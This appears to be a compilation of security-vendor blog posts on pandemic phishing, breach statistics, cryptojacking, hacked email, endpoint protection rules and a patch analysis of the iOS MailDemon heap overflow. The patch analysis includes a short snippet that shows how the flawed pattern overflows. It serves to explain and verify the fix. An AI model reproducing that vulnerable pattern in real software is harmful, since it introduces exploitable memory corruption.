"I think we could definitely see more social engineering attacks with people pretending to be employees having problems with remote access. Also, new phishing attacks that take advantage of so many remote access procedures changing. Organizations hastily deploying remote access might not be securing it," Chris explains. "There are a lot of companies that don't make remote access a normal part of their business and may now need to do this."

The rates we're already seeing are staggering. Data from Atlas VPN shows a 350 percent increase in phishing sites detected by Google since January. And it's no surprise that attackers are using a global event for financial gain; Verizon's 2020 Data Breach Investigations Report highlights that 86 percent of surveyed breaches were financially motivated, with over 80 percent of hacking breaches involving brute force attacks or the use of stolen credentials through phishing.

Pandemic-related cyberattacks

The Verizon report also found that financially motivated social engineering attacks are steadily increasing year over year, which means the global pandemic offers even more of an opportunity for threat actors. As everything has shifted to digital during the pandemic, these established trends present a virtual goldmine for malicious behavior. Here are some of the attacks we've seen that exploit this new normal:

Microsoft Teams: With increased remote work, organizations of all sizes are relying on communication tools like Microsoft Teams. Researchers from Abnormal Security discovered in April that attackers had been sending fake emails resembling Microsoft Teams notifications, phishing for employee credentials. The platform suffered two separate attacks, the first of which used URL redirects to send unsuspecting users to a domain hosting the attack. The second directed users to multiple YouTube pages before ultimately sending them to the phishing site where they may have exposed their credentials.

DocuSign: Researchers at Abnormal Security also discovered that a phishing email targeted 50,000 to 60,000 DocuSign users through Microsoft Office 365. The email, urging recipients to review a document about COVID-19, used a concealed malicious URL within the text, which brought users to a website phishing for credentials. Abnormal Security notes that this attack was particularly successful as DocuSign is an essential tool for signing online documents, especially at a time with dispersed workforces.
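Both campaigns above turn on the same two tricks: a link whose visible text does not match where it actually goes, and an intermediate redirect that hides the final phishing host. As an added example (written for this edit, not code from Veracode or Abnormal Security), the Python below pulls the anchors out of an HTML message and flags those tricks, plus any link whose final destination is outside an allow-list of hosts the notification should legitimately use. The sample message, the `.test` redirector and the `example.org` hosts are constructed for the demo; nothing here reproduces the real attacker infrastructure.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Constructed sample notification, modelled on the lure described above.
# The hosts are reserved example/test names, not real infrastructure.
SAMPLE_EMAIL_HTML = """
<p>You have a new Teams message.</p>
<a href="https://login.microsoftonline.com/">Open Teams</a>
<a href="https://example-redirector.test/r?u=https://teams-login.example.org/auth">https://teams.microsoft.com</a>
<a href="https://docs.example.org/covid-19.pdf">Review document</a>
"""

# Hosts a genuine Teams notification is allowed to link to (assumption for the demo).
TRUSTED_HOSTS = {"login.microsoftonline.com", "teams.microsoft.com"}


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def extract_links(html):
    parser = _LinkCollector()
    parser.feed(html)
    return parser.links


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def embedded_redirect(url):
    """Return the first query-string value that is itself an absolute URL,
    the signature of an open-redirect style hop, or None."""
    for values in parse_qs(urlparse(url).query).values():
        for value in values:
            if value.lower().startswith(("http://", "https://")):
                return value
    return None


def analyze_links(html, trusted_hosts=TRUSTED_HOSTS):
    """Return [(href, [reasons...])]; an empty reason list means the link looks clean."""
    findings = []
    for href, text in extract_links(html):
        href_host = host_of(href)
        reasons = []
        # 1. Visible text shows one host, the link actually goes to another.
        if text.lower().startswith(("http://", "https://")) and host_of(text) != href_host:
            reasons.append(f"display text host {host_of(text)} != link host {href_host}")
        # 2. The link carries a second URL in its query string (redirect hop).
        inner = embedded_redirect(href)
        if inner:
            reasons.append(f"redirects to {host_of(inner)}")
        # 3. The host the user ends up on is not one this notification should use.
        final_host = host_of(inner) if inner else href_host
        if final_host not in trusted_hosts:
            reasons.append(f"final host {final_host} not trusted")
        findings.append((href, reasons))
    return findings


if __name__ == "__main__":
    for href, reasons in analyze_links(SAMPLE_EMAIL_HTML):
        print(("SUSPICIOUS " if reasons else "ok         ") + href, reasons)
```

Only the first query-string hop is inspected; a real gateway would follow the chain (the YouTube bounces mentioned above would only show up by resolving each hop) and would treat a mismatch between text and target as a high-confidence signal regardless of the allow-list.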

Instacart: As more people began using food delivery services to avoid grocery stores, they became a clear target for threat actors. A research firm recently alerted Instacart of a bug that would allow attackers to send malicious links to shoppers via text message. Attackers have also been sending malicious bots after browser extensions meant to help users grab coveted grocery delivery timeslots for services like Instacart.

10x Genomics: Healthcare organizations are at increased risk, too. In March, biotech research firm 10x Genomics was hit by an attack that resulted in stolen company data. The firm, which is compiling information related to COVID-19 to aid possible treatments, was able to isolate the attack quickly despite losing some sensitive information. Attackers reportedly leveraged REvil ransomware, which is also being used to exploit VPN and gateway vulnerabilities within healthcare organizations that are experiencing higher than usual strain due to the pandemic.

Protecting your business continuity

Malicious actors work hard to manipulate weak security protocols and unfixed vulnerabilities wherever possible, especially during times of widespread change and uncertainty. But there's good news from Veracode: our Static Analysis scan numbers hit a record high in March and then hit another record high in April. Our customers are remaining vigilant about their security so they can continue to protect their data and the data of their own customers.

If you're concerned about the state of your AppSec program or need guidance, we're here to help ensure that you can maintain business continuity during the pandemic. Stay one step ahead of attackers by:

  • Shifting security left to the beginning of the software development lifecycle (SDLC) so that developers can write more secure code sooner rather than later.
  • Scanning earlier in the development process to catch flaws and scanning more often to reduce the risk that comes from security debt.
  • Utilizing penetration testing to locate information that may be used in social engineering or phishing attacks within your organization.
  • Using tools like Veracode Security Labs for hands-on training, and IDE Scan for real-time feedback that helps developers learn as they code.

Learn more about thwarting cyberattacks by future-proofing your application security.

Verizon Data Breach Investigations Report Finds an Increase in Web Application Breaches

Verizon recently published its 2020 Data Breach Investigations Report (DBIR), which analyzed 32,002 security incidents in 16 different industries and four different world regions. Similar to last year's findings, the majority of breaches (86 percent) are financially motivated, and most (70 percent) are caused by outsiders. Credential theft, social attacks (i.e., phishing and business email compromise), and errors are still causing the majority of breaches. As stated in the DBIR, "These tactics prove effective for attackers, so they return to them time and again."

Just as there are many similarities from last year's DBIR, there are also many differences. An important change worth noting is that web applications were part of more than 43 percent of breaches, more than double the amount from last year. Stolen credentials were used in more than 80 percent of these incidents.

The DBIR found that the cause of the increase in web application breaches was a result of more people moving their workflows to the cloud. In light of the current pandemic, with more and more businesses undergoing digital transformations, the number of web application breaches will likely increase.

"As remote working surges in the face of the global pandemic, end-to-end security from the cloud to employee laptop becomes paramount," said Tami Erwin, CEO, Verizon Business.

Web application threats were found to be prevalent in all 16 industries, but especially in retail. The retail industry is seeing a major threat to their e-commerce applications, a trend that has carried over since 2019. It's vital that retailers invest in a comprehensive application security (AppSec) program and scan their applications frequently.

Our recent State of Software Security (SOSS) report found that in the retail industry, 40 percent of applications are only scanned once a year. By increasing the number of scans, the retail industry could find and remediate more flaws and address security debt. Our analysis also found that there are two OWASP Top 10 vulnerabilities that should be on the retail industry's radar: Code Injection and Credentials Management. Retail has a higher percentage of risks that fall into these categories. This is likely due to the fact that retailers need to authenticate users and handle input. Once again, more frequent scanning should help address these flaws.

To learn more about protecting web applications, check out our AppSec products and services.

Hidden demons? MailDemon Patch Analysis: iOS 13.4.5 Beta vs. iOS 13.5

Summary and TL;DR

Further to Apple's patch of the MailDemon vulnerability (see our blog here), the ZecOps Research Team has analyzed and compared the MailDemon patches in iOS 13.4.5 beta and iOS 13.5.

Our analysis concluded that the patches are different, and that the iOS 13.4.5 beta patch was incomplete and could still be vulnerable under certain circumstances.

Since the 13.4.5 beta patch was insufficient, Apple issued a complete patch using a different approach, which fixes the issue completely on both iOS 13.5 and iOS 12.4.7 (a special security update for older devices).

This may explain why it took about one month for a full patch to be released. 

iOS 13.4.5 beta patch

The following is the heap-overflow vulnerability patch on iOS 13.4.5 beta.

The function -[MFMutableData appendBytes:length:] raises an exception if -[MFMutableData _mapMutableData] returns false.

In order to see when -[MFMutableData _mapMutableData] returns false, let’s take a look at how it is implemented:

When mmap fails, _mapMutableData returns false but still allocates an 8-byte chunk and stores the pointer in self->bytes. The patch raises an exception before copying data into self->bytes, which only partially solves the heap overflow issue.

 -[MFMutableData appendData:]
 |
 +--  -[MFMutableData appendBytes:length:] **<-patch**
    |
    +-- -[MFMutableData _mapMutableData]

The patch makes sure an exception is raised inside -[MFMutableData appendBytes:length:]. However, other functions also call -[MFMutableData _mapMutableData] and then use self->bytes, which is the 8-byte chunk if mmap fails. These functions do not check whether mmap failed, because the patch only affects -[MFMutableData appendBytes:length:].

Following is an actual backtrace taken from MobileMail:

 * frame #0: 0x000000022a0fd018 MIME`-[MFMutableData _mapMutableData:]
    frame #1: 0x000000022a0fc2cc MIME`-[MFMutableData bytes] + 108
    frame #2: 0x000000022a0fc314 MIME`-[MFMutableData mutableBytes] + 52
    frame #3: 0x000000022a0f091c MIME`_MappedAllocatorAllocate + 76
    frame #4: 0x0000000218cd4e9c CoreFoundation`_CFRuntimeCreateInstance + 324
    frame #5: 0x0000000218cee5c4 CoreFoundation`__CFStringCreateImmutableFunnel3 + 1908
    frame #6: 0x0000000218ceeb04 CoreFoundation`CFStringCreateWithBytes + 44
    frame #7: 0x000000022a0eab94 MIME`_MFCreateStringWithBytes + 80
    frame #8: 0x000000022a0eb3a8 MIME`_filter_checkASCII + 84
    frame #9: 0x000000022a0ea7b4 MIME`MFCreateStringWithBytes + 136

-[MFMutableData mutableBytes]
|
+--  -[MFMutableData bytes]
   |
   +--  -[MFMutableData _mapMutableData:]

The buffer returned by mutableBytes is normally assumed to be writable, following Apple's documentation:

This property is similar to, but different than the bytes property. The bytes property contains a pointer to a constant. You can use the bytes pointer to read the data managed by the data object, but you cannot modify that data. However, if the mutableBytes property contains a non-null pointer, this pointer points to mutable data. You can use the mutableBytes pointer to modify the data managed by the data object.

Apple’s documentation

Both -[MFMutableData mutableBytes] and -[MFMutableData bytes] return self->bytes, which points to the 8-byte chunk if mmap fails. A caller that writes through that pointer can therefore cause a heap overflow under some circumstances.

The following is an example of how things could go wrong. The heap overflow still happens even though the length is checked before memcpy, because the check compares against the logical length reported by the object rather than the size of the chunk that was actually allocated:

size_t length = 0x30000;
MFMutableData* mdata = [MFMutableData alloc];
char* data = malloc(length);
mdata = [mdata initWithBytesNoCopy:data length:length];
size_t mdata_len = [mdata length];          // still reports 0x30000, whether or not mmap succeeded
char* mbytes = [mdata mutableBytes];        // mbytes could be the 8-byte chunk
size_t new_data_len = 90;
char* new_data = malloc(new_data_len);
if (new_data_len <= mdata_len) {            // check passes: 90 <= 0x30000
    memcpy(mbytes, new_data, new_data_len); // heap overflow if mmap failed
}

iOS 13.5 Patch

With the iOS 13.5 patch, an exception is raised in -[MFMutableData _mapMutableData] right after mmap fails, and the 8-byte chunk is no longer handed out. This approach fixes the issue completely.
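The following C model, added here as an illustration and not ZecOps' or Apple's code, contrasts the two patch strategies described above for the memcpy example and for the 13.5 fix. The real layout of MFMutableData is not known to this example; it models only the behaviour the analysis describes (mmap failure leaving an 8-byte chunk in self->bytes) and tracks the real chunk size so that an out-of-bounds write is reported instead of performed.

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Which patch strategy the model applies. */
enum patch_mode { PATCH_BETA, PATCH_FINAL };

typedef struct {
    size_t length;    /* logical length, analogous to -[MFMutableData length] */
    size_t capacity;  /* real size of the chunk behind bytes (tracked only by this model) */
    char  *bytes;     /* backing buffer, analogous to self->bytes */
    bool   mapped;    /* whether the map step succeeded */
} mf_data_t;

/* Simulated mmap outcome; set per scenario (assumed, not a real mmap). */
static bool fake_mmap_fails = false;

/* Models -[MFMutableData _mapMutableData]. Under the beta patch, failure returns
   false but still installs an 8-byte chunk. Under the final patch, failure leaves
   nothing usable behind (the exception in the real patch is modelled as bytes == NULL). */
static bool map_mutable_data(mf_data_t *d, enum patch_mode mode) {
    if (!fake_mmap_fails) {
        d->bytes = calloc(d->length, 1);
        d->capacity = d->length;
        d->mapped = (d->bytes != NULL);
        return d->mapped;
    }
    d->mapped = false;
    if (mode == PATCH_BETA) {
        d->bytes = calloc(8, 1);  /* the 8-byte chunk described in the analysis */
        d->capacity = 8;
    } else {
        d->bytes = NULL;          /* final patch: no buffer is handed out */
        d->capacity = 0;
    }
    return false;
}

/* Models -[MFMutableData mutableBytes]: maps on demand and returns self->bytes
   without checking whether the map succeeded (neither patch touches this path). */
static char *mutable_bytes(mf_data_t *d, enum patch_mode mode) {
    if (d->bytes == NULL) {
        map_mutable_data(d, mode);
    }
    return d->bytes;
}

/* The caller pattern from the text: check n against the logical length, then memcpy.
   Returns true when the copy would run past the real chunk (the heap overflow);
   the write is only performed when it is in bounds, so the model itself stays safe. */
static bool copy_would_overflow(mf_data_t *d, enum patch_mode mode,
                                const char *src, size_t n) {
    size_t mdata_len = d->length;
    char *mbytes = mutable_bytes(d, mode);
    if (mbytes == NULL) return false;   /* final patch: the operation is refused */
    if (n > mdata_len) return false;    /* the length check that looks sufficient... */
    if (n > d->capacity) return true;   /* ...but the chunk may be smaller than length */
    memcpy(mbytes, src, n);
    return false;
}

/* Runs one scenario with the sizes from the text (0x30000 logical length, 90-byte copy)
   and reports whether the copy would overflow. */
static bool scenario(enum patch_mode mode, bool mmap_fails, size_t n) {
    mf_data_t d = { .length = 0x30000, .capacity = 0, .bytes = NULL, .mapped = false };
    char *src = calloc(n, 1);  /* constructed input; contents do not matter */
    fake_mmap_fails = mmap_fails;
    bool overflow = copy_would_overflow(&d, mode, src, n);
    free(src);
    free(d.bytes);
    return overflow;
}

int main(void) {
    printf("beta patch,  mmap ok:    overflow=%d\n", scenario(PATCH_BETA, false, 90));
    printf("beta patch,  mmap fails: overflow=%d\n", scenario(PATCH_BETA, true, 90));
    printf("final patch, mmap fails: overflow=%d\n", scenario(PATCH_FINAL, true, 90));
    return 0;
}
```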

Summary

The iOS 13.5 patch is the correct way to patch this heap overflow vulnerability. It is important to double-check security patches and verify that a patch is complete.

At ZecOps we help developers find security weaknesses and automatically validate whether an issue was correctly solved. If you would like to find similar vulnerabilities in your applications/programs, we are now adding additional users to our CrashOps SDK beta program.
If you do not own an app and would like to inspect your phone for suspicious activity, check out the ZecOps iOS DFIR solution, Gluon.

Realigning Priorities and Building a Bridge Between Security and Development

It's a common conundrum for application security (AppSec) teams: how can developers and security professionals work together to release software faster? It takes a working relationship, good communication, and the right tools, which most teams don't have.

Even more discouraging, stigmas follow both teams around the office; developers often worry that security is there to slow down or halt their projects while security is concerned that developers aren't prioritizing secure code. As modern software development becomes faster with tighter deadlines and an array of cyberthreats awaiting vulnerable code, there's little room for misalignment.

It's a multifaceted issue that should be understood from both angles. Misaligned business priorities and processes can create an array of problems, from a lack of innovation for fear of increased risk to unforeseen vulnerabilities falling through the cracks during the development process. And when developers aren't empowered to improve their skills with educational tools like Security Labs, there's less of a chance that they'll feel prepared or appreciated when security comes knocking.

To begin addressing these concerns, changes must come from the top-down, trickling through each team to impact their goals and methods for an overall healthier AppSec program. When they have direction, developers and security leaders can find a common ground by building a working relationship that benefits both teams (and ultimately, the entire organization). Three key steps to fixing the misalignment between security and development include:

  1. Shifting to a security-focused mindset across the business.
  2. Implementing a security champions program to encourage developer participation.
  3. Making it easier for the development team to write secure code.

Once security leaders understand the tools and methodologies developers are most comfortable with, and developers have the opportunity to learn more about security practices, closing the gap between these two otherwise siloed teams isn't as daunting. With the right tools, processes, and communication methods in place, security and development will have an easier time falling into the right working cadence to produce more secure applications.

Watch our video "Tips for Unifying the Security Professional and Developer Roles" below to hear from Veracode's Chief Technical Officer Chris Wysopal and Chief Product Officer Ian McLeod on how these roles became misaligned, and how organizations can tackle the problem head-on.

My Flight Path: From the Royal Air Force to McAfee

By: Gareth, Technical Support Engineer, UK

Where do you see yourself in five years? This well-known question is the crux of any career planning. Your answer may take self-reflection with twists and turns or it may be a more obvious, straightforward path. My answer was the latter—or so I thought.

Just last year, my answer was serving in the Royal Air Force (RAF). But here I am, at McAfee as a veteran through McAfee’s Return to Workplace program. I’m thankful my career took a few twists.

Change in Flight Path

For nearly two decades, serving in the RAF was all I knew. I carried out ceremonial duties in the Queen’s Colour Squadron, deployed airfield communication systems and served as an instructor for several certification courses. The RAF was my second home. I imagined my career beginning and ending with a commitment to serve and protect.

Last year, my career veered left. After a severe injury, I was medically discharged. The surgery and rehabilitation proved a challenge, but the loss of what felt like my lifelong purpose was another shock to my system that took time to accept.

In a way, I felt prepared. Flight paths change. I refocused this as an unexpected opportunity to reinvent myself in the civilian world.

Finding Flight Instructions

I asked myself the infamous question, “Where do you see yourself in five years?” I landed in the technology sector as a logical next step, given my background. My answer didn’t include belonging—I doubted I would find a sense of purpose the RAF offered.

All too quickly, I learned military certifications don’t hold much value to corporations. Prospective employers informed me I didn’t have the right education or the right experience.

I needed flying instructions to support my entry into seemingly foreign territory.

I stood on the edge of defeat when I stumbled upon McAfee’s Return to Workplace program—for veterans! This 12-week program would provide classroom and on-the-job training I could add to my resume. Here were my flying instructions.

A New Squadron at McAfee

My fingers couldn’t click apply fast enough. I was the first veteran accepted into the program. Though newly established, my experience was second to none. The stand-out training and customer work rebuilt my confidence.

I even found belonging and purpose. The team environment is not unlike the military. Team members willingly supported me in solving problems or directing me to someone who could help. Although how I protect my family, community and government looks different from military to McAfee, my purpose remains.

I’m thrilled to continue my work with McAfee after the 12-week period. I plan to support other veterans through McAfee’s Return to Workplace program. Even though I’m qualified and capable, my difficulty in finding civilian work is not a unique experience for veterans. I’m hopeful I can make a difference for veterans looking to reenter civilian life and help others realize the value veteran experience offers.

I’m confident I now have the skills needed for takeoff and where do I see myself in five years? At McAfee.

Join a company that values all experiences. Search our openings.

The post My Flight Path: From the Royal Air Force to McAfee appeared first on McAfee Blogs.

Understanding How Bitcoin Mining Poses Security Risks

The value of Bitcoin has had its ups and downs over the past several years, but continues to attract interest in the midst of a chaotic market. The rapid growth of this alternate currency has dominated headlines and ignited a cryptocurrency boom that left consumers everywhere wondering how to get a slice of the Bitcoin pie. For those that want to join the craze without trading traditional currencies like U.S. dollars, a process called “Bitcoin mining” appears to be a great way to get involved. However, Bitcoin mining introduces a number of security risks.

What is Bitcoin mining?

Mining for Bitcoin is like mining for gold—you put in the work and you get your reward. But instead of back-breaking labor, you earn the currency with your time and computer processing power. “Miners”, as they are called, essentially upkeep and help secure Bitcoin’s decentralized accounting system.

Each time there’s a transaction it’s recorded in a digital ledger called the “blockchain.” Miners help to update the ledger by downloading a special piece of software that allows them to verify and collect new transactions to be added to the blockchain. Then, they must solve a mathematical puzzle to be able to add a block of transactions to the chain. In return, they earn Bitcoins, as well as transaction fees.

What are the security risks?

As the digital currency has matured, Bitcoin mining has become more challenging. In the beginning a user could mine on their home computer and earn a good amount of the digital currency, but these days the math problems have become so complicated that it requires a lot of expensive computing power.

This is where the risks come in. Since miners need an increasing amount of computer power to earn Bitcoin, some have started compromising public Wi-Fi networks so they can access users' devices to mine for Bitcoin. Such an event happened at a coffee shop in Buenos Aires, which was infected with malware that caused a 10-second delay when logging in to the cafe's Wi-Fi network. The malware authors were using this time to access the users' laptops for mining.

In addition to public Wi-Fi networks, millions of websites are being compromised to access users’ devices for mining. In fact, this has become such a widespread problem, that over 1 billion devices are believed to be slowed down by web-based mining. And slowing your device down is not even the worst thing that could happen. A device that is “cryptojacked” could have 100 percent of its resources used for mining, causing the device to overheat, essentially destroying it.

Now that you know a little about Bitcoin mining and the risks associated with it, here are some tips to keep your devices safe as you monitor the cryptocurrency market:

  • Avoid public Wi-Fi networks—These networks often aren’t secured, opening your device and information up to a number of threats.
  • Use a VPN— If you’re away from your secure home or work network, consider using a virtual private network (VPN). This is a piece of software that gives you a secure connection to the Internet, so that third parties cannot intercept or read your data. A product like McAfee Safe Connect can help safeguard your online privacy no matter where you go.
  • Secure Your Devices—New threats like Bitcoin malware are emerging all of the time. Protect your devices and information with comprehensive security software, and keep informed on the latest threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

What is disk cleanup and does it remove viruses?

It happens. You’re in the middle of a computing task, and your screen blinks. The blue screen (Stop Error) is shown with the message that your PC ran into an error and needs to restart. These hiccups occur when your computer’s software, firmware, or drivers crash due to faulty or incompatible hardware or software.

If you’re like most people, you want a computer that’s nimble enough to keep up with your life. When your computer is bogged down with outdated files, you aren’t able to work at an efficient pace.

While a new computer or external drive may give you more file storage space, there’s a faster way to gain usable storage space without straining your budget. This option is called disk cleanup, and all Windows computers come with a version of it that you can use to reclaim hard disk space gratis. Here are some things that you need to know about Microsoft’s disk cleanup tool.

What is Disk Cleanup?

Disk cleanup is a maintenance utility that was developed by Microsoft for its Windows operating system. The utility scans your computer’s hard drive for files that you no longer need such as temporary files, cached webpages, and rejected items that end up in your system’s Recycle Bin. Unless you remove those files, they add up over time and begin taking a lot of space on your computer.

The utility displays the identified files and the amount of storage space that each of them uses within your hard drive. You decide which items to delete by the importance that you place on the files and the amount of hard drive space that you’ll be able to recover. In Windows 10, you can reach this utility by going to your start menu and scrolling to Windows Administrative Tools to click the disk cleanup button.

Windows also has the feature Quick Clean which lets you clean up the junk temporary files from your Windows desktop safely and quickly. It also cleans additional junk files, which the Disk Cleanup Utility does not.

What are System updates?

System updates such as major OS releases, monthly patches and emergency updates have become standard for today’s computers. Most operating systems are set to download the latest updates automatically. However, on Windows devices, the previous version of an operating system isn’t always deleted when the latest version replaces it. After years of updates, you’ll often have several versions of the OS on your computer.

The disk cleanup utility allows you to remove backup shadow copies from your computer. Programs that you download to open or edit a document take up storage space on your computer’s hard drive long after you’ve completed your project. Disk cleanup allows you to locate those programs, see how much storage space they use, and remove them to free up hard disk space. You’ll find these features by selecting the “more options” tab within the disk cleanup menu.

What is Storage Sense?

Microsoft Windows 10 comes with an upgraded disk cleanup function that’s called Storage Sense. With Storage Sense, you can set your system to automatically clean up unwanted files by setting the tab to the “on” position. You choose to allow Storage Sense to remove temporary files that your programs no longer use, files in the Download folder that haven’t changed in 30 days, and files that have been sitting in your Recycle Bin for over 30 days. You can reach Storage Sense by going to the Settings menu, clicking on the Systems button, and selecting the Storage option.

What Are the Benefits of Disk Cleanup?

While you can search for temporary files yourself and delete them manually, you save time by using the Windows disk cleanup tool. You can search your entire hard disk for specific files within a matter of seconds with the disk cleanup utility. The tool also gives you greater control over which files to delete and those to keep. When outdated application files are removed from your system, it runs more smoothly and has fewer crashes.

Does Disk Cleanup Remove Viruses?

One of the most common ways that viruses enter computer systems is through downloads. A user lands on an untrusted website and clicks on a button to get a free download. The download contains a virus that goes undetected. If the application remains untouched for longer than 30 days, you can run the disk cleanup utility to find the offending download and remove it quickly. While you shouldn’t use disk cleanup as a replacement for a robust antivirus product, the tool can work in conjunction with a trusted antivirus solution to better safeguard your computer’s system, files, and data.

The Wrap Up

Whether you use your computer to work from home or to manage your household, you’ll want it to function as it should. This includes the flexibility to download a program for a short-term project or quickly process spreadsheets to share with coworkers on an online portal. These operations are greatly impaired when your hard disk is full of unnecessary files and bloatware. Using the Windows disk cleanup tool allows you to remove these files that could contain malware and increase the capacity and safety of your computing environment.

My email has been hacked! What should I do next?

Signs Your Email Was Hacked

With the advent of #Staysafe and #Shelterinplace, personal email communication has skyrocketed. This increase has given clever hackers more opportunities to worm their way in, installing viruses via attachments and other common techniques.

You Know You’ve Been Hacked When…

Your Contacts are Receiving Messages Not Sent By You

Messages that appear to come from you to friends or business contacts should alert you to a serious problem on your computer. Friends may feel comfortable letting you know about these emails, but business contacts or professional associates may not. Hackers can install malware on their computers through email attachments, and the intruder can find a password with surprisingly little effort.

Your Online Password Stops Working

As a regular visitor to your favorite sites, you know the password that each one requires. You may accidentally strike a wrong key and create a typo, but doing it twice is highly unlikely. If a password you know to be correct stops working, consider the possibility that someone has hacked your email.

Once inside your computer, hackers have almost free rein to look for your passwords. Many people keep a list of passwords for convenience, but a hacker who finds such a file gains access to everything in it.

Slow and Erratic Computer Performance

Unpredictable conduct by your computer can mean that a virus may have infected it. The sluggishness that replaces the usual prompt response that you expect tells you that you have a problem. Spyware, a malicious type of software, can track your online activity, tamper with your files, and even steal your private information.

When you consider the burden that spyware can place on your system, you can understand the reason for its lackluster speed. While you probably did not notice anything wrong when you downloaded a picture from a website or clicked on an attachment in an email, a virus could have accompanied it. Until you remove the virus, you may feel as though you have someone watching you, and you do.

Watching for Ransomware

A particularly insidious form of malicious software comes with an ability to make you pay for the privilege of controlling your computer. Ransomware can enter your system through emails, and you allow it to do so when you click on an attractive attachment from an unknown sender. Ransomware can lock your files and make them inaccessible. The troublemakers who put it there demand a fee to release its grip on your system.

Perhaps more dangerous than other malicious invasions of your computer, ransomware carries a penalty that can completely deny you access to your files and cost you money to get them back. As a reminder of the hazard of opening attachments that can damage your computer and your finances, an email that installs ransomware deserves immediate attention.

What Should I Do if My Email is Hacked?

Change your password

This is the first thing you must do to ensure that the hacker can't get back into your account. Your new password must be complex and unrelated to previous passwords. Always use 8-10 characters with a mix of upper and lower case characters as well as numbers and symbols.

Reach out to your email contacts immediately

A big part of the hacker’s strategy is to ‘get their claws’ into your address book to hook others as well. Send a message to all of your email contacts as soon as possible. Let them know they should avoid opening any emails (most likely loaded with malware) that have come from you.

Change your security question

If you have security questions associated with your email account, be sure to change them too. Make them unpredictable and niche.

Enable Multi-Factor Authentication

Yes, multi-factor authentication adds another step to your login, but it also adds another layer of protection. Enabling this will mean that in addition to your password, you will need a unique one-time use code to log in. This is usually sent to your mobile phone.

Scan your computer for malware and viruses

This is an essential step. Comprehensive security software will provide you with a digital shield for your online life. McAfee Total Protection lets you protect all your devices – including your smartphone – from viruses and malware. It also contains a password manager to help you remember and generate unique passwords for all your accounts.

Change any other accounts with the same password

This is time-consuming but a worthwhile effort. Ensure that you change any other accounts that use the same username and password as your compromised email. Hackers love when we use the same logins for multiple accounts.

Stay protected

While email can pose potential security risks, antivirus software protects your computer system from potential damage. Programs that run efficiently in the background detect and eliminate threats. Awareness and preparedness can help you thwart attempts to hack private information and let you maintain a secure environment online.

How To Use McAfee ATP to Protect Against Emotet, LemonDuck and PowerMiner

Introduction

This blog describes how McAfee ATP (Adaptive Threat Protection) rules are used within McAfee Endpoint Security products. It will help you understand how ATP Rules work and how you can utilize them to prevent infections from prevalent malware families such as Emotet, LemonDuck and PowerMiner. Please read through the recommendation section to effectively utilize rules in your environment.

ATP rules are a form of Attack Surface reduction technology which detects suspicious use of OS features and applications. These rules target behaviors which are often abused by malware authors. There can be cases where legitimate applications utilize the same behavior and hence rules need to be configured based on the environment.

ATP rules within McAfee Endpoint Security (ENS) 10.5.3 and above have already detected over a million pieces of malware since the start of 2020. This blog will show you how to enable ATP rules and explains why they should be enabled by highlighting some of the malware we detect with them. We’ll also show you how to maximize detection capabilities by tweaking some specific settings.

First, let’s start with an overview. We release ATP rules in three types: Evaluate, DefaultOn and HighOn.

Evaluate rules are tested in the field by McAfee to determine if they are robust enough to detect malicious activity while not producing false positives. Once a rule has been in evaluate mode for a period of time, McAfee researchers will analyze its performance and either make modifications or promote it to DefaultOn or HighOn. ENS ATP customers connected to McAfee ePolicy Orchestrator (ePO) can manually change Evaluate rules to Enabled mode.

DefaultOn rules are created when McAfee has high confidence that no legitimate applications will be impacted. These rules are then enabled by default in all McAfee Endpoint Security rule groups.

HighOn rules detect behavior that is known to be malicious but may have some overlap with non-malicious applications. These rules are set to Observe mode for systems in the “Balanced” rule group, but act as DefaultOn for systems in the “Security” rule group. Later in this blog, we cover how to change the rule group in Endpoint Security products to enable HighOn rules.

How to enable ATP rules in ENS 10.5.3 and above

By default, many ATP rules are set to Observe mode. To enable these rules in an active-blocking mode, log in to the ePO Console and go to Menu->Configuration->Server Settings.


Figure 1. Rules in the Balanced rule group.

Select Adaptive Threat Protection and select the required rule group (Productivity, Balanced, or Security).

As seen in Figure 1, Rule 329 is in Observe mode in the Balanced rule group and, in Figure 2 below, you can see it is Enabled by default in the Security rule group.

Note: As mentioned previously, we analyze rules from time to time and make modifications, so you may see different settings in your environment depending on the content version.

 

Figure 2. Rules in Security rule group.

To enable a rule, click Edit below the rules, select the rule you would like to change, then select the desired state: Disabled, Enabled, or Observe. Figure 3 shows how to change the state of Rule 256, which helps detect Emotet and Trickbot downloaders.

 

Figure 3. Changing the Rule State.

Click Save and the rule should be enabled on the clients within a few minutes. Here you can see that Rule 256 blocks the malicious file JTI/Suspect.131328 by default.

Figure 4. Evaluate Rule blocking after Enabling.

Change the assigned rule group to use HighOn rules in ENS 10.5.3 and above

In this section, we will step through how you can change the rule group to “Security” which will enable all the HighOn rules in block mode by default. We recommend you check the logs to see if the HighOn rules have detected clean activity within your environments before changing to this rule group.

To change the rule group, log in to the ePO console and go to Menu->Systems->System Tree.

Figure 5. Selecting the group of systems to modify Policies for ENS.

Select a group and go to the Assigned Policies tab. Select ‘Endpoint Security Adaptive Threat Protection’ from the product dropdown.

Figure 6. Selecting policies to modify the assigned rule group.

Click on ‘My Default’ policy under the ‘Options’ category.

 

Figure 7. Changing the rule group to Security.

Scroll down to Rule Assignment. From the Rule Assignment drop-down list, select Security and click Save. This will update all the clients with ‘My Default’ policy to the Security rule group.

Enable HighOn rules in MVISION Endpoint

To enable HighOn rules, MVISION Endpoint policy needs to be set to ‘High Protection’ if it is not already set by default. Follow these steps:

Log in to the ePO console and go to Menu->Systems->System Tree.

Figure 8. Selecting the group of systems to modify policies for MVISION Endpoint

Select a group and go to the Assigned Policies tab. Select ‘MVISION Endpoint’ from the product dropdown.

Figure 9. Selecting the policies to change the Protection mode.

Click on ‘Edit Assignment’ under General Category.

Figure 10. Changing MVISION Endpoint to High Protection.

